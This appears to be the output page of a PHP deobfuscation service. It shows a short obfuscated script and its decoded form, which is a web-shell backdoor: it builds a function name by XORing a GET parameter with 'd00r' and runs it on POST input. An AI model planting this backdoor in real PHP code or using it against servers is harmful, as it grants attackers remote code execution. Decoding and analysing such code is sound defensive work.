Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php set_time_limit(3); ini_set('max_execut..
Decoded Output download
<?php
set_time_limit(3);
ini_set('max_execution_time', 3);
highlight_file(__FILE__);$f=file(__FILE__);
$c=chr(substr_count($f[1],chr(32)));
$x=(substr($_GET[87],0,4)^"d00r");$x(${"_POST"}{$c}); ?>
Did this file decode correctly?
Original Code
<?php
set_time_limit(3);
ini_set('max_execution_time', 3);
highlight_file(__FILE__);$f=file(__FILE__);
$c=chr(substr_count($f[1],chr(32)));
$x=(substr($_GET[87],0,4)^"d00r");$x(${"_\x50\x4f\x53\x54"}{$c});
Function Calls
ini_set | 1 |
highlight_file | 1 |
set_time_limit | 1 |
Stats
MD5 | 272a8662f6dbc18f162ce87c0f375b98 |
Eval Count | 0 |
Decode Time | 86 ms |